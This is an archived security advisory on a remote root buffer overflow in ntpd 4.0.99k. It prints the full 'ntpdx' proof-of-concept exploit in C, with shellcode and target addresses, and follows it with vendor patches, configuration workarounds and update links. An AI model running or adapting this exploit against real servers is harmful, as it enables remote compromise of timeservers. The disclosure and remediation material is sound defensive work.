COMMAND
ntpd
SYSTEMS AFFECTED
ntpd =< 4.0.99k
PROBLEM
Przemyslaw Frasunek found following. Network Time Protocol Daemon
(ntpd) shipped with many systems is vulnerable to remote buffer
overflow attack. It occurs when building response for a query
with large readvar argument. In almost all cases, ntpd is running
with superuser privileges, allowing to gain REMOTE ROOT ACCESS to
timeserver.
Althought it's a normal buffer overflow, exploiting it is much
harder. Destination buffer is accidentally damaged, when attack
is performed, so shellcode can't be larger than approx. 70 bytes.
This proof of concept code uses small execve() shellcode to run
/tmp/sh binary. Full remote attack is possible.
NTP is stateless UDP based protocol, so all malicious queries can
be spoofed.
/*
*
* Example of use on generic RedHat 7.0 box:
*
* [venglin@cipsko venglin]$ cat dupa.c
* main() { setreuid(0,0); system("chmod 4755 /bin/sh"); }
* [venglin@cipsko venglin]$ cc -o /tmp/sh dupa.c
* [venglin@cipsko venglin]$ cc -o ntpdx ntpdx.c
* [venglin@cipsko venglin]$ ./ntpdx -t2 localhost
* ntpdx v1.0 by venglin@freebsd.lublin.pl
*
* Selected platform: RedHat Linux 7.0 with ntpd 4.0.99k-RPM (/tmp/sh)
*
* RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query
* [1] <- evil query (pkt = 512 | shell = 45)
* [2] <- null query (pkt = 12)
* Done.
* /tmp/sh was spawned.
* [venglin@cipsko venglin]$ ls -al /bin/bash
* -rwsr-xr-x 1 root root 512540 Aug 22 2000 /bin/bash
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <arpa/inet.h>
#define NOP 0x90
#define ADDRS 8
#define PKTSIZ 512
static char usage[] = "usage: ntpdx [-o offset] <-t type> <hostname>";
/* generic execve() shellcodes */
char lin_execve[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/sh";
char bsd_execve[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
struct platforms
{
char *os;
char *version;
char *code;
long ret;
int align;
int shalign;
int port;
};
/* Platforms. Notice, that on FreeBSD shellcode must be placed in packet
* *after* RET address. This values will vary from platform to platform.
*/
struct platforms targ[] =
{
{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
0xbfbff8bc, 200, 220, 0 },
{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
0xbfbff540, 200, 220, 0 },
{ "RedHat Linux 7.0", "4.0.99k-RPM (/tmp/sh)", lin_execve,
0xbffff777, 240, 160, 0 },
{ NULL, NULL, NULL, 0x0, 0, 0, 0 }
};
long getip(name)
char *name;
{
struct hostent *hp;
long ip;
extern int h_errno;
if ((ip = inet_addr(name)) < 0)
{
if (!(hp = gethostbyname(name)))
{
fprintf(stderr, "gethostbyname(): %s\n",
strerror(h_errno));
exit(1);
}
memcpy(&ip, (hp->h_addr), 4);
}
return ip;
}
int doquery(host, ret, shellcode, align, shalign)
char *host, *shellcode;
long ret;
int align, shalign;
{
/* tcpdump-based reverse engineering :)) */
char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61,
0x74, 0x75, 0x6d, 0x3d };
char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00 };
char buf[PKTSIZ], *p;
long *ap;
int i;
int sockfd;
struct sockaddr_in sa;
bzero(&sa, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(123);
sa.sin_addr.s_addr = getip(host);
if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
{
perror("socket");
return -1;
}
if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0)
{
perror("connect");
close(sockfd);
return -1;
}
memset(buf, NOP, PKTSIZ);
memcpy(buf, q2, sizeof(q2));
p = buf + align;
ap = (unsigned long *)p;
for(i=0;i<ADDRS/4;i++)
*ap++ = ret;
p = (char *)ap;
memcpy(buf+shalign, shellcode, strlen(shellcode));
if((write(sockfd, buf, PKTSIZ)) < 0)
{
perror("write");
close(sockfd);
return -1;
}
fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ,
strlen(shellcode));
fflush(stderr);
if ((write(sockfd, q3, sizeof(q3))) < 0)
{
perror("write");
close(sockfd);
return -1;
}
fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3));
fflush(stderr);
close(sockfd);
return 0;
}
int main(argc, argv)
int argc;
char **argv;
{
extern int optind, opterr;
extern char *optarg;
int ch, type, ofs, i;
long ret;
opterr = ofs = 0;
type = -1;
while ((ch = getopt(argc, argv, "t:o:")) != -1)
switch((char)ch)
{
case 't':
type = atoi(optarg);
break;
case 'o':
ofs = atoi(optarg);
break;
case '?':
default:
puts(usage);
exit(0);
}
argc -= optind;
argv += optind;
fprintf(stderr, "ntpdx v1.0 by venglin@freebsd.lublin.pl\n\n");
if (type < 0)
{
fprintf(stderr, "Please select platform:\n");
for (i=0;targ[i].os;i++)
{
fprintf(stderr, "\t-t %d : %s %s (%p)\n", i,
targ[i].os, targ[i].version, (void *)targ[i].ret);
}
exit(0);
}
fprintf(stderr, "Selected platform: %s with ntpd %s\n\n",
targ[type].os, targ[type].version);
ret = targ[type].ret;
ret += ofs;
if (argc != 1)
{
puts(usage);
exit(0);
}
fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending query\n",
(void *)ret, targ[type].align, targ[type].shalign);
if (doquery(*argv, ret, targ[type].code, targ[type].align,
targ[type].shalign) < 0)
{
fprintf(stderr, "Failed.\n");
exit(1);
}
fprintf(stderr, "Done.\n");
if (!targ[type].port)
{
fprintf(stderr, "/tmp/sh was spawned.\n");
exit(0);
}
exit(0);
}
This exploit worked on FreeBSD 4.2-STABLE with the stock 4.0.99b.
More sobering, blindly aiming the exploit code at a Sparc running
xntpd 3.4y caused it to seg. fault and core.
Both exploits crash 4.0.99b on FreeBSD 4.2-STABLE; the first dies
with SIGBUS, the second with SIGILL.
This exploit causes a denial of service, crashing the NTP daemon,
when run against a NetBSD system. The capability to exploit the
vulnerability and execute code has not yet been confirmed on
NetBSD, though it is presumed to exist. It is likely that minor
alterations to the detail of the published exploit code will
produce a viable remote root attack.
The version of xntp3 that shipped with Slackware 7.1 as well as
the version that was in Slackware -current contains a buffer
overflow bug that could lead to a root compromise.
SOLUTION
Unless systems depend critically on NTP for very accurate time, or
have very poor local clocks, the NetBSD project recommends that
running NTP daemons be temporarily disabled immediately, to
prevent the risk of compromise while fixes are being applied.
Systems running releases older than NetBSD 1.4 should be upgraded
to NetBSD 1.4.3 before applying the fixes described here. Systems
running NetBSD-current dated from before 2001-04-05 should be
upgraded to NetBSD-current dated 2001-04-05 or later. Systems
running NetBSD releases 1.4.x or 1.5 should apply the following
patches. These patches have been pulled up to the release
branches, users tracking the release branches should update to a
code newer than 2001-04-05. The two patches are the same, apart
from some formatting differences and relocation of the file that
occurred in the interim.
For NetBSD-1.5 (apply the following patch to
/usr/src/dist/ntp/ntpd/ntp_control.c):
--- ntp_control.c 2000/04/22 14:53:15 1.1.1.2
+++ ntp_control.c 2001/04/05 02:08:01 1.2
@@ -1812,9 +1812,22 @@
while (cp < reqend &&
isspace((int)*cp))
cp++;
- while (cp < reqend && *cp !=
- ',')
+ while (cp < reqend && *cp != ',') {
*tp++ = *cp++;
+ if (tp >=
+ buf + sizeof(buf) - 1) {
+#if 0 /* don't syslog for now - DoS potential on filling syslog */
+ msyslog(LOG_WARNING,
+ "Attempted \"ntpdx\" exploit from IP %d.%d.%d.%d:%d (possibly spoofed)\n",
+ (ntohl(rmt_addr->sin_addr.s_addr) >> 24) & 0xff,
+ (ntohl(rmt_addr->sin_addr.s_addr) >> 16) & 0xff,
+ (ntohl(rmt_addr->sin_addr.s_addr) >> 8) & 0xff,
+ (ntohl(rmt_addr->sin_addr.s_addr) >> 0) & 0xff,
+ ntohs(rmt_addr->sin_port));
+#endif
+ return (0);
+ }
+ }
if (cp < reqend)
cp++;
*tp = '\0';
For NetBSD-1.4.x (apply the following patch to
/usr/src/usr.sbin/xntp/xntpd/ntp_control.c):
--- ntp_control.c 1998/08/27 20:31:02 1.6
+++ ntp_control.c 2001/04/05 01:50:18
@@ -1757,8 +1757,22 @@ ctl_getitem(var_list, data)
tp = buf;
while (cp < reqend && isspace(*cp))
cp++;
- while (cp < reqend && *cp != ',')
+ while (cp < reqend && *cp != ',') {
*tp++ = *cp++;
+ if (tp >=
+ buf + sizeof(buf) - 1) {
+#if 0 /* don't syslog for now - DoS potential on filling syslog */
+ msyslog(LOG_WARNING,
+ "Attempted \"ntpdx\" exploit from IP %d.%d.%d.%d:%d (possibly spoofed)\n",
+ (ntohl(rmt_addr->sin_addr.s_addr) >> 24) & 0xff,
+ (ntohl(rmt_addr->sin_addr.s_addr) >> 16) & 0xff,
+ (ntohl(rmt_addr->sin_addr.s_addr) >> 8) & 0xff,
+ (ntohl(rmt_addr->sin_addr.s_addr) >> 0) & 0xff,
+ ntohs(rmt_addr->sin_port));
+#endif
+ return (0);
+ }
+ }
if (cp < reqend)
cp++;
*tp = '\0';
There is a patch for the NTP software from
http://phk.freebsd.dk/patch/ntpd.patch
For most implementations, that for all clients you can do a
restrict default ignore
restrict <time1.server.ip> noquery nomodify notrap nopeer
restrict <time2.server.ip> noquery nomodify notrap nopeer
to eliminate most exposure from the reported overflow. On your
(local) time masters, you would have to do something like:
restrict default ignore
restrict <your.network> mask <your.netmask> noquery nomodify notrap nopeer notrust
restrict <higher_stratum.server1.ip> noquery nomodify notrap
restrict <higher_stratum.server2.ip> noquery nomodify notrap
You will also have to specify the time servers by IP address, and
you will need to include the "special" ip address of 127.127.1.0
if you use fallback to the local clock.
Time servers which ntpd is synchronized to, are also subjected to
the restriction. So, if this is the only `restrict' in your
ntp.conf, it also prevents synchronization to the time server.
For Debian:
http://security.debian.org/debian-security/dists/stable/updates/main/source/ntp_4.0.99g-2potato2.diff.gz
http://security.debian.org/debian-security/dists/stable/updates/main/source/ntp_4.0.99g-2potato2.dsc
http://security.debian.org/debian-security/dists/stable/updates/main/source/ntp_4.0.99g.orig.tar.gz
http://security.debian.org/debian-security/dists/stable/updates/main/binary-all/ntp-doc_4.0.99g-2potato2_all.deb
http://security.debian.org/debian-security/dists/stable/updates/main/binary-all/xntp3_4.0.99g-2potato2_all.deb
http://security.debian.org/debian-security/dists/stable/updates/main/binary-alpha/ntp_4.0.99g-2potato2_alpha.deb
http://security.debian.org/debian-security/dists/stable/updates/main/binary-alpha/ntpdate_4.0.99g-2potato2_alpha.deb
http://security.debian.org/debian-security/dists/stable/updates/main/binary-arm/ntp_4.0.99g-2potato2_arm.deb
http://security.debian.org/debian-security/dists/stable/updates/main/binary-arm/ntpdate_4.0.99g-2potato2_arm.deb
http://security.debian.org/debian-security/dists/stable/updates/main/binary-i386/ntp_4.0.99g-2potato2_i386.deb
http://security.debian.org/debian-security/dists/stable/updates/main/binary-i386/ntpdate_4.0.99g-2potato2_i386.deb
http://security.debian.org/debian-security/dists/stable/updates/main/binary-m68k/ntp_4.0.99g-2potato2_m68k.deb
http://security.debian.org/debian-security/dists/stable/updates/main/binary-m68k/ntpdate_4.0.99g-2potato2_m68k.deb
http://security.debian.org/debian-security/dists/stable/updates/main/binary-powerpc/ntp_4.0.99g-2potato2_powerpc.deb
http://security.debian.org/debian-security/dists/stable/updates/main/binary-powerpc/ntpdate_4.0.99g-2potato2_powerpc.deb
http://security.debian.org/debian-security/dists/stable/updates/main/binary-sparc/ntp_4.0.99g-2potato2_sparc.deb
http://security.debian.org/debian-security/dists/stable/updates/main/binary-sparc/ntpdate_4.0.99g-2potato2_sparc.deb
For Immunix:
http://immunix.org/ImmunixOS/6.2/updates/RPMS/xntp3-5.93-14_StackGuard_2.i386.rpm
http://immunix.org/ImmunixOS/6.2/updates/SRPMS/xntp3-5.93-14_StackGuard_2.src.rpm
http://immunix.org/ImmunixOS/7.0/updates/RPMS/ntp-4.0.99j-7_imnx_2.i386.rpm
http://immunix.org/ImmunixOS/7.0/updates/SRPMS/ntp-4.0.99j-7_imnx_2.src.rpm
For Linux-Mandrake:
Linux-Mandrake 6.0: 6.0/RPMS/xntp3-5.93-9.4mdk.i586.rpm
6.0/SRPMS/xntp3-5.93-9.4mdk.src.rpm
Linux-Mandrake 6.1: 6.1/RPMS/xntp3-5.93-9.4mdk.i586.rpm
6.1/SRPMS/xntp3-5.93-9.4mdk.src.rpm
Linux-Mandrake 7.0: 7.0/RPMS/xntp3-5.93-9.3mdk.i586.rpm
7.0/SRPMS/xntp3-5.93-9.3mdk.src.rpm
Linux-Mandrake 7.1: 7.1/RPMS/ntp-4.0.99k-3.1mdk.i586.rpm
7.1/RPMS/xntp3-5.93-9.2mdk.i586.rpm
7.1/SRPMS/ntp-4.0.99k-3.1mdk.src.rpm
7.1/SRPMS/xntp3-5.93-9.2mdk.src.rpm
Linux-Mandrake 7.2: 7.2/RPMS/ntp-4.0.99k-3.1mdk.i586.rpm
7.2/RPMS/xntp3-5.93-9.1mdk.i586.rpm
7.2/SRPMS/ntp-4.0.99k-3.1mdk.src.rpm
7.2/SRPMS/xntp3-5.93-9.1mdk.src.rpm
Corporate Server 1.0.1: 1.0.1/RPMS/ntp-4.0.99k-3.1mdk.i586.rpm
1.0.1/RPMS/xntp3-5.93-9.2mdk.i586.rpm
1.0.1/SRPMS/ntp-4.0.99k-3.1mdk.src.rpm
1.0.1/SRPMS/xntp3-5.93-9.2mdk.src.rpm
For Caldera Systems:
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/xntp-3.5.93e-5.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/SRPMS/xntp-3.5.93e-5.src.rpm
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/xntp-3.5.93e-5.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/SRPMS/xntp-3.5.93e-5.src.rpm
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/xntp-4.0.97-2.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/SRPMS/xntp-4.0.97-2.src.rpm
For Red Hat:
ftp://updates.redhat.com/5.2/en/os/SRPMS/xntp3-5.93-14.src.rpm
ftp://updates.redhat.com/5.2/en/os/alpha/xntp3-5.93-14.alpha.rpm
ftp://updates.redhat.com/5.2/en/os/i386/xntp3-5.93-14.i386.rpm
ftp://updates.redhat.com/5.2/en/os/sparc/xntp3-5.93-14.sparc.rpm
ftp://updates.redhat.com/6.2/en/os/SRPMS/xntp3-5.93-15.src.rpm
ftp://updates.redhat.com/6.2/en/os/alpha/xntp3-5.93-15.alpha.rpm
ftp://updates.redhat.com/6.2/en/os/i386/xntp3-5.93-15.i386.rpm
ftp://updates.redhat.com/6.2/en/os/sparc/xntp3-5.93-15.sparc.rpm
ftp://updates.redhat.com/7.0/en/os/SRPMS/ntp-4.0.99k-15.src.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/ntp-4.0.99k-15.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/i386/ntp-4.0.99k-15.i386.rpm
Slackware 7.1 and Slackware -current users are urged to upgrade
to the new packages available for their release. The updated
package available for Slackware 7.1 is a patched version of xntp3.
The -current tree has been upgraded to ntp4, which also fixes the
problem. If you want to continue using xntp3 on -current, you
can use the updated package from the Slackware 7.1 tree and it
will work. The updates available are:
- xntp3-5.93e ftp://ftp.slackware.com/pub/slackware/slackware-7.1/patches/packages/xntp.tgz
- ntp-4.0.99k23 ftp://ftp.slackware.com/pub/slackware/slackware-current/slakware/n1/ntp4.tgz
For Progeny Linux:
http://archive.progeny.com/progeny/updates/newton/ntp_4.0.99g-2.0progeny6_i386.deb
For SuSE Linux:
ftp://ftp.suse.com/pub/suse/i386/update/7.1/n2/xntp-4.0.99f-34.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/xntp-4.0.99f-34.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.0/n1/xntp-4.0.99f-37.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/xntp-4.0.99f-37.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.4/n1/xntp-4.0.99f-38.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/xntp-4.0.99f-38.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.3/n1/xntp-4.0.98d-1.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.3/zq1/xntp-4.0.98d-1.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.2/n1/xntp-4.0.93a-18.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.2/zq1/xntp-4.0.93a-18.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.1/n1/xntp-4.0.92c-1.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.1/zq1/xntp-4.0.92c-1.src.rpm
ftp://ftp.suse.com/pub/suse/sparc/update/7.0/n1/xntp-4.0.99f-19.sparc.rpm
ftp://ftp.suse.com/pub/suse/sparc/update/7.0/zq1/xntp-4.0.99f-19.src.rpm
ftp://ftp.suse.com/pub/suse/axp/update/7.0/n1/xntp-4.0.99f-22.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/7.0/zq1/xntp-4.0.99f-22.src.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.4/n1/xntp-4.0.99f-22.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.4/zq1/xntp-4.0.99f-22.src.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.3/n1/xntp-4.0.98d-1.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.3/zq1/xntp-4.0.98d-1.src.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.1/n1/xntp-4.0.92c-40.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.1/zq1/xntp-4.0.92c-40.src.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/7.0/n1/xntp-4.0.99f-21.ppc.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/7.0/zq1/xntp-4.0.99f-21.src.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/6.4/n1/xntp-4.0.99f-21.ppc.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/6.4/zq1/xntp-4.0.99f-21.src.rpm
For Trustix:
http://www.trusix.net/pub/Trustix/updates/
ftp://ftp.trusix.net/pub/Trustix/updates/
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/xntp3-5.93-21cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/xntp3-5.93-21cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/xntp3-5.93-21cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/xntp3-5.93-21cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/xntp3-5.93-21cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/xntp3-5.93-21cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/xntp3-5.93-21cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/xntp3-5.93-21cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/xntp3-5.93-21cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/xntp3-5.93-21cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/xntp3-5.93-21cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/xntp3-5.93-21cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/xntp3-5.93-21cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/libcap-1.10-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/xntp3-5.93-21cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/libcap-1.10-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/libcap-devel-1.10-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/xntp3-5.93-21cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/xntp3-5.93-21cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/xntp3-5.93-21cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/xntp3-5.93-21cl.i386.rpm
For EnGarde Secure Linux:
ftp://ftp.engardelinux.org/pub/engarde/stable/updates/
http://ftp.engardelinux.org/pub/engarde/stable/updates/
- SRPMS/xntp3-5.93-1.0.16.src.rpm
- i686/xntp3-5.93-1.0.16.i686.rpm
For Turbo Linux:
ftp://ftp.turbolinux.com/pub/updates/6.0/security/xntp3-5.93-10.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/security/xntp3-server-5.93-10.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/xntp3-5.93-10.src.rpm
For SCO OpenServer:
ftp://ftp.sco.com/SSE/sse074.tar.Z
ftp://ftp.sco.com/SSE/sse074.ltr
For FreeBSD:
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:31/ntpd-4.x.patch
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:31/ntpd-4.x.patch.asc
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:31/ntpd-3.x.patch
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:31/ntpd-3.x.patch.asc
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/net/ntp-4.0.99k_2.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/net/ntp-4.0.99k_2.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/net/ntp-4.0.99k_2.tgz
AIX 4.3.x and 5.1: APAR assignment pending. Temporary fixes for
AIX 4.3.x and 5.1 systems are available. The temporary fixes can
be downloaded via ftp from:
ftp://aix.software.ibm.com/aix/efixes/security/xntpd_efix.tar.Z
Fix will not be provided for versions prior to 4.3 as these are
no longer supported by IBM. Affected customers are urged to
upgrade to 4.3.3 at the latest maintenance level, or to 5.1, when
it becomes available.
For Compaq's Tru64 UNIX V4.0d, V4.0f, V4.0g, V5.0, V5.0a, V5.1:
http://ftp1.support.compaq.com/public/dunix/
V4.0D: DUV40D16-C0058302-10580-20010430.tar
V4.0F: DUV40F16-C0042002-10579-20010430.tar
V4.0G: T64V40G16-C0003502-10577-20010430.tar
V5.0: T64V5016-C0006102-10575-20010430.tar
V5.0A: T64V50A16-C0010402-10574-20010430.tar
V5.1: T64V513-C0027202-10573-20010430.tar
A patch for Compaq Tru64 UNIX V4.0e is not available as it is no
longer supported by Compaq. If you require a patch for V4.0e
please contact your normal Compaq Services channel.